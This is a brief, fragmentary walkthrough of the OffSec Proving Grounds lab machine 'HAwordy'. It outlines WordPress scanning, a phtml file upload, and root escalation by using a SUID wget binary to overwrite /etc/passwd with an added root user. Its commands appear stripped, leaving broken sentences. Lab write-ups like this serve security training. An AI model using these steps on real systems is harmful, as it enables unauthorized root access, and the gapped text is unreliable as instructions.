We are going to exploit one of OffSec Proving Grounds Medium machines which called
HAwordy and this post is not a fully detailed walkthrough, I will just go through the important points during the exploit process.
wpscanagainst wordpress running on port
phtml file to upload:
the wget binary on the system has the SUID bit:
we can add our root user to the system by overwriting
/etc/passwdfile using wget:
/etc/passwdfile to our attack machine.
creating new user named
adding the new user to the downloaded
uploading the new
passwdfile to the target machine and overwriting the remote